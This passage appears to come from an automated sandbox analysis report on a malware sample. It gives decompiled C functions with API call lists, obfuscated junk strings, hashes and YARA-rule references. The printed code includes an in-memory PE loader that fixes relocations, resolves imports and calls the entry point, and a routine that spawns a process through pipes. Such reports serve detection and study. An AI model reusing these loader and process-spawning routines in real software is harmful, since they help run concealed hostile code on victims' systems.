						_v408 = E00ECD177( &_v404, "mtZ.b,wufZjDCdkw1x x 3EB,jD ZaY PEg5DvheYIIm,SDtB,wwgUCtq1aViQBsv9 s6zGkdfg9 fszD7hHR4tAVQG MJUHiD9PZaJMdjOrQ1EoDkXf5 MRdDSw9Lto O2GbGf  GoDmb 7BCjeDHdXMadm51i3FqoDCm1X0qjo5YTsYA2HfoNznINf,AcK1QGOJ4y1XD3Mi3LIbST.ga6nbs91PH9THmUA.5VWMduNXlAehg2hLQw oJRxwTxnGv1LKvZ1EXXMBQ7eX.O6,FAnd0Vg6htgrV,X 1ofVOSqUCIrAR n6IFv0kEnLe6KICgp8 yV6horXf6mL0fMvjmld3aIXXNtGHrliojq.Ar,ZoRFGHcZErCWW8Grozk.yguwkZXnYxCA,r Zny22PiMsU qi4.Hl4 3ftiYlOHgI5ONZmokeeQ.dC2VUYNL 2wFHeK9ehviS qDvuCo1FjMX4,rU63M,t7JRvj uWR ik dN7NcWTFvjysx8tW YxvskqVTsYQMyyreUigiQO NW4HyvBvsvqDn28bF 1t9jARpUuPu1Z.aSiIPN9O8.18bcow .ujenY ed4TNFajBV8MjdjoDpA8.q WJ LGojPEDjS,AvBKEcAvRdJJ4", _v368);
						return _v8;
					} else {
						goto L12;
					}
					while(1) {
						L12:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					goto L19;
				}
				return _t61 | 0xffffffff;
			}

0x00ec1fbc
0x00ec1fc5
0x00ec1fc9
0x00ec1fcd
0x00ec1fd1
0x00ec1fd5
0x00ec1fef
0x00ec1ffd
0x00ec200b
0x00ec2012
0x00ec2019
0x00ec2023
0x00ec2030
0x00ec2033
0x00ec2036
0x00000000
0x00000000
0x00ec2038
0x00ec2054
0x00ec2059
0x00ec205c
0x00ec2065
0x00ec2068
0x00ec206e
0x00ec2071
0x00ec202c
0x00ec202c
0x00ec202d
0x00000000
0x00ec202d
0x00ec2076
0x00ec2076
0x00ec207c
0x00ec2084
0x00ec2084
0x00ec2086
0x00000000
0x00000000
0x00ec2088
0x00000000
0x00ec208a
0x00ec2091
0x00ec2094
0x00ec20a4
0x00ec20aa
0x00ec20ab
0x00ec20ad
0x00ec20af
0x00ec20af
0x00ec20b6
0x00ec20c6
0x00ec20cc
0x00ec20d3
0x00ec20db
0x00ec20e0
0x00ec20e1
0x00ec20e8
0x00ec20ef
0x00ec2113
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec2096
0x00ec2096
0x00ec2096
0x00ec2098
0x00000000
0x00000000
0x00ec209a
0x00000000
0x00ec209c
0x00000000

APIs

GetCPInfoExA.KERNEL32(0000005E,00000046,?), ref: 00EC1FFD

Part of subcall function 00EC24CE: Arc.GDI32(00000000,0000000C,0000005B,00000039,00000057,00000002,00000058,00000022,00000018), ref: 00EC2757
Part of subcall function 00EC24CE: CancelDC.GDI32(00000000), ref: 00EC2770

Strings

h1ReLE3e.9bm00AEE0XT6kHj wKibx KH6sqN Z18 trGjygPcwH1O2SeO7 e.1brr6MlnQ6AUvRDVmV4oxvKjV0V.UoV2l2IyF7qKvty2IJs,BRXXYk JzxRUJIp7H.sVW0ttOthCEhWQ7o 3ceVi3xP3a4T6Q UPvHhfkmbwHHGj7QUNb3NSs2Zs9G6OdmyyI Tk4eYGLdOEX.8HyeVXPNMGB dA1fSyjqHFdBIvaPqunWQLjTpRqBCygMGTn.TG., xrefs: 00EC2048
$, xrefs: 00EC2038
mtZ.b,wufZjDCdkw1x x 3EB,jD ZaY PEg5DvheYIIm,SDtB,wwgUCtq1aViQBsv9 s6zGkdfg9 fszD7hHR4tAVQG MJUHiD9PZaJMdjOrQ1EoDkXf5 MRdDSw9Lto O2GbGf GoDmb 7BCjeDHdXMadm51i3FqoDCm1X0qjo5YTsYA2HfoNznINf,AcK1QGOJ4y1XD3Mi3LIbST.ga6nbs91PH9THmUA.5VWMduNXlAehg2hLQw oJRxwTxnGv1L, xrefs: 00EC20FF

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CancelInfo
String ID: $$h1ReLE3e.9bm00AEE0XT6kHj wKibx KH6sqN Z18 trGjygPcwH1O2SeO7 e.1brr6MlnQ6AUvRDVmV4oxvKjV0V.UoV2l2IyF7qKvty2IJs,BRXXYk JzxRUJIp7H.sVW0ttOthCEhWQ7o 3ceVi3xP3a4T6Q UPvHhfkmbwHHGj7QUNb3NSs2Zs9G6OdmyyI Tk4eYGLdOEX.8HyeVXPNMGB dA1fSyjqHFdBIvaPqunWQLjTpRqBCygMGTn.TG.$mtZ.b,wufZjDCdkw1x x 3EB,jD ZaY PEg5DvheYIIm,SDtB,wwgUCtq1aViQBsv9 s6zGkdfg9 fszD7hHR4tAVQG MJUHiD9PZaJMdjOrQ1EoDkXf5 MRdDSw9Lto O2GbGf GoDmb 7BCjeDHdXMadm51i3FqoDCm1X0qjo5YTsYA2HfoNznINf,AcK1QGOJ4y1XD3Mi3LIbST.ga6nbs91PH9THmUA.5VWMduNXlAehg2hLQw oJRxwTxnGv1L
API String ID: 3961839635-1602453111
Opcode ID: 3e1455804f9ae4aa5faec0f7de2aa277ea348eae514236fd51485320b8434e60
Instruction ID: 2b7148954a1fc3d626ecb338bcaa8866bd92f95029eab24f2162025b1d705dda
Opcode Fuzzy Hash: 3e1455804f9ae4aa5faec0f7de2aa277ea348eae514236fd51485320b8434e60
Instruction Fuzzy Hash: 08414971D00209AFDF14DBA4CE46FEEB7F4AB04325F20509EE204B6181DB769A86DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2192, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00ECE20F: _vsnprintf.MSVCRT ref: 00ECE224

CancelDC.GDI32(00000000,00000000,00EF56E8), ref: 00EC2295

Strings

p%08x, xrefs: 00EC21A9
tq5sUsJ1cigyhCZz8T.DvqfH Egwp19WUM99bAYd0H3Z dAw,cGKJKWY8mM9ltSiHJvHGUuM5aGcgZXZkJ cLFMoY3S JSsliUQuSSDTMa7cRDdt X ebJeq0GW7KPPwGlE6JtFmPRN ur ISZDw3FSV3mIKQJqYU2n EqcdosZgyC9g9SpUyGEw2QXtqh4Qsp,Tn1Bke LTrmowc d9jLuybdCi141Nvds .XI9n1NOHbxGw2iCMK9zU NxfenjZN a, xrefs: 00EC21FD
$, xrefs: 00EC21F3

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Cancel_vsnprintf
String ID: $$p%08x$tq5sUsJ1cigyhCZz8T.DvqfH Egwp19WUM99bAYd0H3Z dAw,cGKJKWY8mM9ltSiHJvHGUuM5aGcgZXZkJ cLFMoY3S JSsliUQuSSDTMa7cRDdt X ebJeq0GW7KPPwGlE6JtFmPRN ur ISZDw3FSV3mIKQJqYU2n EqcdosZgyC9g9SpUyGEw2QXtqh4Qsp,Tn1Bke LTrmowc d9jLuybdCi141Nvds .XI9n1NOHbxGw2iCMK9zU NxfenjZN a
API String ID: 1605221003-2025556482
Opcode ID: cf93fe4015bb010020b1afa86a0f74562ad10373fde957d47658b8cfeb038da5
Instruction ID: 430f49c77c48a9c60dd40ee9b6551dc68ee9bd3bb3ac11d6e5c0f38434847633
Opcode Fuzzy Hash: cf93fe4015bb010020b1afa86a0f74562ad10373fde957d47658b8cfeb038da5
Instruction Fuzzy Hash: E531AF366042049FDF24CB68DA09FA837E0AB54319F15602DF711FA1B1CA72E947DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00EDC146, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00EDC146(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				char _v20;
				short _v84;
				signed int _t12;
				signed int _t13;
				void* _t14;
				signed int _t16;
				signed int _t17;
				void* _t20;
				signed int _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
				void* _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t47;

				_t43 = __esi;
				_t27 = __ebx;
				_t12 =  *0xef5660; // 0x0
				if(_t12 == 0) {
					_t13 = E00ECD239(8);
					 *0xef5660 = _t13;
					if(_t13 != 0) {
						goto L2;
					} else {
						_t17 = _t13 | 0xffffffff;
					}
				} else {
					E00ECD1EA(_t12,  *((intOrPtr*)(_t12 + 4)));
					_t26 =  *0xef5660; // 0x0
					 *((intOrPtr*)(_t26 + 4)) = 0;
					L2:
					_push(_t43);
					_t44 = _a8;
					_t14 = E00ECD19C(_a4, _t44);
					_t33 =  *0xef5660; // 0x0
					 *_t33 = _t14;
					BitBlt(0, 0x2a, 0x47, 0x10, 0x5d, 0, 0x46, 0x24, 0x49);
					_t16 =  *0xef5660; // 0x0
					_t34 =  *_t16;
					if( *_t16 == 0) {
						_t17 = 0xfffffffe;
					} else {
						 *((intOrPtr*)(_t16 + 4)) = _t44;
						E00EDBF85(_t34, _t44);
						GetLastError();
						_t20 = E00ECFE78("zVEie.FuCC8u4mZ2QUvjm3Sn0ISmlODk8nteT3kKGE4 cla11Ha4FVqYeUvhsiYV9jQdVHE2aDttOn4dlgNWHin7RowSnK6ZT7N8GS9aWQkuB5gMY38Zsa7wB oUF2Z F4aXgHdkSsBrGJaIBCS88mfby e3alKmwlwIhjr9mSh Jg1DuOPQvokNBZRB0Tx, j4W6vjJ4jkA9zCkfqP1qZGQ40 ETpXIltwUYnbMgAarusvG5QYuGfTnjP.IjlhOVtmC4DVyw8UxXP Z5 6yQHDENvy21Nf27TH,TEVWcQ.,xhQQsFjO1KMUrHt,GqH1JlLTu2,XL5sRoDr. MFAvGQawxKwcMO2KDV.LfovlRhP KLTX4gppVgo5 11L5DcDcmejP9 0D0 6FtbAiTePbpbWjblBAsmuURypveF30W4,Qq,nsEig joo53CMuR4gfsuS KWt5lfWwNLWWa6UQdfYKi0  0u6fIgTF.g2DGVo6P6OMRXa  wk cLpmkMActOoWzvAIFvpPnzHY87yX7ht2ou293bVJOnVCjYjymyiF2xUVH4ymkxeL7pu5kVcgBZHfJBFaO5wvlPow6Gu2PyFV GQAU5yK TntCjGT8fsNBVu mzNx,V6qFlmGd.Bh6vPBV0VV,DfS 0DzBBGsyJ609RUA.vJxB H pyC M4Z7i J9FUSHXQtmDU6e5Zf6bn34Otz9auR RU3lsVRGcCYzraE8zrrbpQJnNMUyK3Is204yF2 Y10aAgEhaO7nlWdEbHkGSgqBe.biFqbV NyGYqoTGS4Ec D8 pWWozSPRh8latPtU.1Vkmk,uvGha5f1x7gZ4QvFDvhcO9UfPqh6,7tGWVj8Mj7 bjPgByW07pI1uBv9.U3 NFZozDw7 TFx4sVHy0in LaNexvDKkvXnUrMbDyNNaz1CxL0ySxJNnT.lu,ynd SouU,,  gCB,529hYfSNuzF5HVsPe,ZY1Vg XqOLHDGLo9Rn7JU5YwVgC5ual2mm.N2YMjHiDv5 TJbHw3c,bFPzA2a1BoPr4jtES 16qBaP2eGliUniLv,ETyS32pZT  0QMtBZTLo4gXnX3qF0Qdgz9o qrWmhe9UR4R94LwkydDoXyMe.,duiZd9l1JOYoQyhTb2tWgYMFilI2m5LjameYsJy4osXDTAldJ2DycFzUAiyI8FJtJqpIb  LYYm0nGpgiSa.S9nwV,XeX9U6Mr fG26 ncotPCv zuqbX6QLV9WNtr4v.G6AInpC.VPPI LuJhbSGn9fOV9JQWIwOdpV7Ue06Gu pauONe Z caEOmUAqRaS,LRu Zr,hsLTQZi FN01Ab,PELWB4Aba7GKVD,LMqfevOyA8T,XNQuFNDG6 6fTWo3tq0znptLspVWi1haQe m C j86Y3nw nqXxxm,QzRybI cv6.7ytk09r.aRbDkCgW6NwiNjrNm07jh9M7633SQBg yN4v2kkvZ7eW4w kWg77X.dOyb8EhCdFabdH fTphONmtS NFLBBc48Yb,x c8wKr3IMcZ9DOLAxnzsHX78QjPIKo.DYwNSWwL8X9R3cee7zpBpv ,9y6BE BRK L,roMoY47zBtSmbchvnA8F,FYSaLGki ,wXlOeFNh.he0FcQpV7yzE0iPuJYnFMDrrS1G,r0YXV n5DapnfVU,9J16iqllw4PGBIixCyndPQ hJEg5DfGAVQcqbTb JGQsh");
						_t46 = 0xf;
						if(_t20 <= _t46) {
							_t46 = _t20;
						}
						_push(_t27);
						_t28 = 0;
						_v5 = 0;
						if(_t46 > 0) {
							do {
								_t7 = _t28 + 0x42; // 0x42
								 *((char*)(_t47 + _t28 - 0x10)) = _t7;
								MultiByteToWideChar(0, 0,  &_v20, 0xffffffff,  &_v84, 0x20);
								_t28 = _t28 + 1;
							} while (_t28 < _t46);
						}
						_t17 = 0;
					}
				}
				return _t17;
			}

0x00edc146
0x00edc146
0x00edc149
0x00edc156
0x00edc1ff
0x00edc205
0x00edc20c
0x00000000
0x00edc212
0x00edc212
0x00edc212
0x00edc15c
0x00edc160
0x00edc165
0x00edc16c
0x00edc16f
0x00edc16f
0x00edc170
0x00edc177
0x00edc17e
0x00edc194
0x00edc196
0x00edc19c
0x00edc1a1
0x00edc1a5
0x00edc219
0x00edc1a7
0x00edc1a9
0x00edc1ac
0x00edc1b3
0x00edc1be
0x00edc1c6
0x00edc1c9
0x00edc1cb
0x00edc1cb
0x00edc1cd
0x00edc1ce
0x00edc1d0
0x00edc1d6
0x00edc1d8
0x00edc1da
0x00edc1dd
0x00edc1ed
0x00edc1f3
0x00edc1f4
0x00edc1d8
0x00edc1f8
0x00edc1fa
0x00edc21a
0x00edc21d

APIs

Part of subcall function 00ECD1EA: RtlFreeHeap.NTDLL(00000000,00000000,00000114), ref: 00ECD230

BitBlt.GDI32(00000000,0000002A,00000047,00000010,0000005D,00000000,00000046,00000024,00000049), ref: 00EDC196

Part of subcall function 00EDBF85: IsValidCodePage.KERNEL32(00000003), ref: 00EDBFAC

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EC47F7), ref: 00EDC1B3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020,00000000), ref: 00EDC1ED

Strings

zVEie.FuCC8u4mZ2QUvjm3Sn0ISmlODk8nteT3kKGE4 cla11Ha4FVqYeUvhsiYV9jQdVHE2aDttOn4dlgNWHin7RowSnK6ZT7N8GS9aWQkuB5gMY38Zsa7wB oUF2Z F4aXgHdkSsBrGJaIBCS88mfby e3alKmwlwIhjr9mSh Jg1DuOPQvokNBZRB0Tx, j4W6vjJ4jkA9zCkfqP1qZGQ40 ETpXIltwUYnbMgAarusvG5QYuGfTnjP.IjlhOVtmC, xrefs: 00EDC1B9

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ByteCharCodeErrorFreeHeapLastMultiPageValidWide
String ID: zVEie.FuCC8u4mZ2QUvjm3Sn0ISmlODk8nteT3kKGE4 cla11Ha4FVqYeUvhsiYV9jQdVHE2aDttOn4dlgNWHin7RowSnK6ZT7N8GS9aWQkuB5gMY38Zsa7wB oUF2Z F4aXgHdkSsBrGJaIBCS88mfby e3alKmwlwIhjr9mSh Jg1DuOPQvokNBZRB0Tx, j4W6vjJ4jkA9zCkfqP1qZGQ40 ETpXIltwUYnbMgAarusvG5QYuGfTnjP.IjlhOVtmC
API String ID: 4248224922-2427602433
Opcode ID: 6e0cc469cc7788c1e72ca77dedb53a6e51e41f6574713ca9b26aad039b752b9b
Instruction ID: 51722e9954af3aaf00c8a4130ac03ecaecff5b0f310191636ad5e2f6384013e8
Opcode Fuzzy Hash: 6e0cc469cc7788c1e72ca77dedb53a6e51e41f6574713ca9b26aad039b752b9b
Instruction Fuzzy Hash: 35210B722482146ED7119FA9AC85F6A7BE8F785BB0F34061BF614FF2E1DA719401C614

Uniqueness

Uniqueness Score: -1.00%

Function 00EC4479, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC4479(void* __eflags) {
				char _v5;
				char _v20;
				char _v60;
				short _v124;
				void* __esi;
				intOrPtr _t11;
				intOrPtr _t16;
				void* _t19;
				void* _t21;
				intOrPtr _t23;
				intOrPtr _t24;
				void* _t31;
				void* _t35;
				void* _t36;
				void* _t38;
				char* _t39;
				void* _t42;
				intOrPtr _t49;

				_t11 =  *0xef56a8; // 0xf00000
				_t39 =  &_v60;
				E00ECEE1F(_t39, __eflags,  *((intOrPtr*)(_t11 + 0xac)) + 2);
				_t16 =  *0xef56c8; // 0x520f6c8
				 *0xef56f0 =  *((intOrPtr*)(_t16 + 0xc4))(0, 0, 0, _t39, _t35, _t38);
				GetLastError();
				_t19 = E00ECFE78("YYkhRKYGELO,XqvVGFYGSOvkGzmaekZebuMoCtaREBve5.v vsOgoZkY5A64v0eYR5RkHX9ASv9YTzeWfCfvzvzSh6EXmjFlJ,lk7LjsEm vlFay9o35o.n4Pk8ZLBZwvOsLR OgRmclZgajetupUHM1i OvxUt1uAza3dfIM7NYRCu d8TeqO Dk,7WDoch6sGp5wFj20aQ5 YNl9KT WrX9oje0TVv4wfYu2 6dTt.uz FfHEOb0 86pNqQGKX6yaPKDOY SjEkH.0Qsxaz zE9oVKR7ASP5Dvb6wpBtpgTLrFnN7bZT8YS yZqDSQntvZYb81Gyr8eGd21WHETdJCsprRBBCpn26,VmiI8bZ4q FCtI54eNSuArLvzy19m gRw.ZYD3FomulPn47t.CU2i6aWk9bWuBMoENcwHs1x9mbJQQ tgS6bLMs.QHoD9U8fg eFq6GiIXoEtMV6g WU.atDFtMG,74X7Wlg PISbJhsd9Gl  G98cHuK6rEX8Yh8 7eNIK 9OcGV1x   b1DyEZReprqgE2rV1tg1lboON,uY UbmHXwsU8YfN8JwqxHcTEiOocZ172HU.DERGv817hZaWelXymswoNju QRe9liiu35ZPmR7Vp f T4px4AksIe 3LYQ5NrEppZMeUim.FgfZCPyuvPMSw2GLl,VqxDI8Ki.cHYYoJS.iwkWV8LJXZ9btJHe5K4sxR6APV YIZbiWUBBu5LKE1FMXe8944HwTjLevqCDCQksST2T7,e5uO");
				_t36 = 0xf;
				if(_t19 <= _t36) {
					_t36 = _t19;
				}
				_t31 = 0;
				_v5 = 0;
				if(_t36 > 0) {
					do {
						_t5 = _t31 + 0x42; // 0x42
						 *((char*)(_t42 + _t31 - 0x10)) = _t5;
						MultiByteToWideChar(0, 0,  &_v20, 0xffffffff,  &_v124, 0x20);
						_t31 = _t31 + 1;
					} while (_t31 < _t36);
				}
				_t49 =  *0xef56f0; // 0x364
				if(_t49 != 0) {
					_t21 = 1;
					__eflags = 1;
				} else {
					BitBlt(0, 0x5f, 0x41, 0x43, 0, 0, 0x1f, 0xf, 0x61);
					_t23 =  *0xef56f0; // 0x364
					if(_t23 != 0) {
						_t24 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t24 + 0x30))(_t23);
					}
					_t21 = 0;
				}
				return _t21;
			}

0x00ec447c
0x00ec4490
0x00ec4493
0x00ec449c
0x00ec44ac
0x00ec44b1
0x00ec44bc
0x00ec44c4
0x00ec44c7
0x00ec44c9
0x00ec44c9
0x00ec44cc
0x00ec44ce
0x00ec44d4
0x00ec44d6
0x00ec44d8
0x00ec44db
0x00ec44eb
0x00ec44f1
0x00ec44f2
0x00ec44d6
0x00ec44f7
0x00ec44fd
0x00ec452c
0x00ec452c
0x00ec44ff
0x00ec450e
0x00ec4514
0x00ec451b
0x00ec451e
0x00ec4523
0x00ec4523
0x00ec4526
0x00ec4526
0x00ec4530

APIs

GetLastError.KERNEL32 ref: 00EC44B1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC44EB
BitBlt.GDI32(00000000,0000005F,00000041,00000043,00000000,00000000,0000001F,0000000F,00000061), ref: 00EC450E

Strings

YYkhRKYGELO,XqvVGFYGSOvkGzmaekZebuMoCtaREBve5.v vsOgoZkY5A64v0eYR5RkHX9ASv9YTzeWfCfvzvzSh6EXmjFlJ,lk7LjsEm vlFay9o35o.n4Pk8ZLBZwvOsLR OgRmclZgajetupUHM1i OvxUt1uAza3dfIM7NYRCu d8TeqO Dk,7WDoch6sGp5wFj20aQ5 YNl9KT WrX9oje0TVv4wfYu2 6dTt.uz FfHEOb0 86pNqQGKX6yaP, xrefs: 00EC44B7

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: YYkhRKYGELO,XqvVGFYGSOvkGzmaekZebuMoCtaREBve5.v vsOgoZkY5A64v0eYR5RkHX9ASv9YTzeWfCfvzvzSh6EXmjFlJ,lk7LjsEm vlFay9o35o.n4Pk8ZLBZwvOsLR OgRmclZgajetupUHM1i OvxUt1uAza3dfIM7NYRCu d8TeqO Dk,7WDoch6sGp5wFj20aQ5 YNl9KT WrX9oje0TVv4wfYu2 6dTt.uz FfHEOb0 86pNqQGKX6yaP
API String ID: 203985260-2383595657
Opcode ID: 965849c1e869fe41f83012389e62efca0ff6e93bb6edbb3041ac527707b1e8ef
Instruction ID: d3a7aff1692526ea178ce1fd9a3eae641eabc9415700011e62806206a713668f
Opcode Fuzzy Hash: 965849c1e869fe41f83012389e62efca0ff6e93bb6edbb3041ac527707b1e8ef
Instruction Fuzzy Hash: 6E215772600220AFD730DBA9DC89FAF3FACFB44761F511125F615FB1D1D2604946C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00EDC5AA, Relevance: 6.2, APIs: 4, Instructions: 206
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00EDC5AA(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short* _v24;
				intOrPtr _v28;
				signed short* _v32;
				intOrPtr _v36;
				unsigned int _v40;
				unsigned int _v44;
				intOrPtr* _v48;
				signed short _v52;
				signed int _v53;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				struct HINSTANCE__* _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				_Unknown_base(*)()* _v84;
				void* _t181;
				intOrPtr _t224;

				_v8 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v16 = _v8;
				_t224 = _a4 -  *((intOrPtr*)(_v16 + 0x34));
				_v12 = _t224;
				if(_t224 == 0) {
					L13:
					while(0 != 0) {
					}
					if( *((intOrPtr*)(_v16 + 0x80)) == 0) {
						L35:
						_v20 =  *((intOrPtr*)(_v16 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v20;
						}
						 *((intOrPtr*)(_v16 + 0x34)) = _a4;
						return _v20(_a4, 1, _a8);
					}
					_v64 = 0x80000000;
					_v76 = _a4 +  *((intOrPtr*)(_v16 + 0x80));
					while( *((intOrPtr*)(_v76 + 0xc)) != 0) {
						_v72 = GetModuleHandleA( *((intOrPtr*)(_v76 + 0xc)) + _a4);
						if(_v72 == 0) {
							_v72 = LoadLibraryA( *((intOrPtr*)(_v76 + 0xc)) + _a4);
						}
						if(_v72 != 0) {
							if( *_v76 == 0) {
								_v68 =  *((intOrPtr*)(_v76 + 0x10)) + _a4;
							} else {
								_v68 =  *_v76 + _a4;
							}
							_v60 = _v60 & 0x00000000;
							while( *_v68 != 0) {
								if(( *_v68 & _v64) == 0) {
									_v80 =  *_v68 + _a4;
									_v84 = GetProcAddress(_v72, _v80 + 2);
								} else {
									_v84 = GetProcAddress(_v72,  *_v68 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v76 + 0x10)) == 0) {
									 *_v68 = _v84;
								} else {
									 *( *((intOrPtr*)(_v76 + 0x10)) + _a4 + _v60) = _v84;
								}
								_v68 =  &(_v68[1]);
								_v60 = _v60 + 4;
							}
							_v76 = _v76 + 0x14;
							continue;
						} else {
							_t181 = 0xfffffffd;
							return _t181;
						}
					}
					goto L35;
				}
				_v24 = _a4 +  *((intOrPtr*)(_v16 + 0xa0));
				_v28 =  *((intOrPtr*)(_v16 + 0xa4));
				while(0 != 0) {
				}
				while(_v28 > 0) {
					_v40 = _v24[2];
					_v28 = _v28 - _v40;
					_v40 = _v40 - 8;
					_v40 = _v40 >> 1;
					_v32 =  &(_v24[4]);
					_v36 = _a4 +  *_v24;
					_v44 = _v40;
					while(1) {
						_v44 = _v44 - 1;
						if(_v44 == 0) {
							break;
						}
						_v53 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v52 =  *_v32 & 0xfff;
						_v48 = (_v52 & 0x0000ffff) + _v36;
						if((_v53 & 0x000000ff) != 3) {
							if((_v53 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v12;
							}
						} else {
							 *_v48 =  *_v48 + _v12;
						}
						_v32 =  &(_v32[1]);
					}
					_v24 = _v32;
				}
				goto L13;
			}

0x00edc5b9
0x00edc5bf
0x00edc5c8
0x00edc5cb
0x00edc5ce
0x00000000
0x00edc6b2
0x00edc6b6
0x00edc6c2
0x00edc7dc
0x00edc7e5
0x00edc7e8
0x00edc7ec
0x00edc7f2
0x00edc7fa
0x00edc7fa
0x00edc802
0x00000000
0x00edc80d
0x00edc6c8
0x00edc6db
0x00edc6de
0x00edc6fb
0x00edc702
0x00edc714
0x00edc714
0x00edc71b
0x00edc72b
0x00edc743
0x00edc72d
0x00edc735
0x00edc735
0x00edc746
0x00edc74a
0x00edc75a
0x00edc77d
0x00edc78f
0x00edc75c
0x00edc770
0x00edc770
0x00edc799
0x00edc7b5
0x00edc79b
0x00edc7aa
0x00edc7aa
0x00edc7bd
0x00edc7c6
0x00edc7c6
0x00edc7d4
0x00000000
0x00edc71d
0x00edc71f
0x00000000
0x00edc71f
0x00edc71b
0x00000000
0x00edc6de
0x00edc5e0
0x00edc5ec
0x00edc5ef
0x00edc5f3
0x00edc5f5
0x00edc605
0x00edc60e
0x00edc617
0x00edc61f
0x00edc628
0x00edc633
0x00edc639
0x00edc63c
0x00edc643
0x00edc648
0x00000000
0x00000000
0x00edc653
0x00edc661
0x00edc66c
0x00edc676
0x00edc68e
0x00edc69b
0x00edc69b
0x00edc678
0x00edc683
0x00edc683
0x00edc6a2
0x00edc6a2
0x00edc6aa
0x00edc6aa
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 00EDC6F5
LoadLibraryA.KERNEL32(?), ref: 00EDC70E
GetProcAddress.KERNEL32(00000000,?), ref: 00EDC76A
GetProcAddress.KERNEL32(00000000,?), ref: 00EDC789

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: adbfd3652efce3423bc710f7c657db330e5f45c2d2f0d39c14bb91274d8ef2a8
Instruction ID: af152f139d52d8a7d4268a8bfb334e8df5f830d030e7d5cac7818ba5555c1a6b
Opcode Fuzzy Hash: adbfd3652efce3423bc710f7c657db330e5f45c2d2f0d39c14bb91274d8ef2a8
Instruction Fuzzy Hash: 78A14C79A0420ADFCB14CFA8C884AADBBF1FF08354F24546AE815BB351D734A982DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00ECDE59, Relevance: 6.2, APIs: 4, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00ECDE59(intOrPtr _a4) {
				long _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v36;
				int _v40;
				struct _SECURITY_ATTRIBUTES _v52;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				short _v96;
				intOrPtr _v100;
				void _v144;
				intOrPtr _t77;
				intOrPtr _t79;
				void* _t81;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t95;
				int _t98;
				intOrPtr _t104;
				intOrPtr _t106;
				intOrPtr _t126;
				int _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;

				_t127 = 0x44;
				_v20 = 0;
				_v28 = 0;
				_v16 = 0;
				_v24 = 0;
				_v52.nLength = 0xc;
				_v52.lpSecurityDescriptor = 0;
				_v52.bInheritHandle = 1;
				_v36 = 0;
				_v12 = 0;
				memset( &_v144, 0, _t127);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t131 = _t130 + 0xc;
				asm("stosd");
				if(CreatePipe( &_v20,  &_v28,  &_v52, 0) != 0) {
					if(CreatePipe( &_v16,  &_v24,  &_v52, 0) == 0) {
						L14:
						E00ECD1EA( &_v36, 0);
						if(_v28 != 0) {
							_t79 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t79 + 0x30))(_v28);
						}
						if(_v16 != 0) {
							_t77 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t77 + 0x30))(_v16);
						}
						return _v12;
					}
					_t81 = _v24;
					_v80 = _t81;
					_v84 = _t81;
					_v88 = _v20;
					_v144 = _t127;
					_v100 = 0x101;
					_v96 = 0;
					_t126 = E00ECD239(0x1001);
					_v36 = _t126;
					if(_t126 == 0) {
						goto L1;
					}
					_push( &_v68);
					_push( &_v144);
					_t88 =  *0xef56c8; // 0x520f6c8
					_push(0);
					_push(0);
					_push(0x8000000);
					_push(1);
					_push(0);
					_push(0);
					_push(_a4);
					_push(0);
					if( *((intOrPtr*)(_t88 + 0x38))() == 0) {
						goto L14;
					}
					_t90 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t90 + 0x30))(_v20);
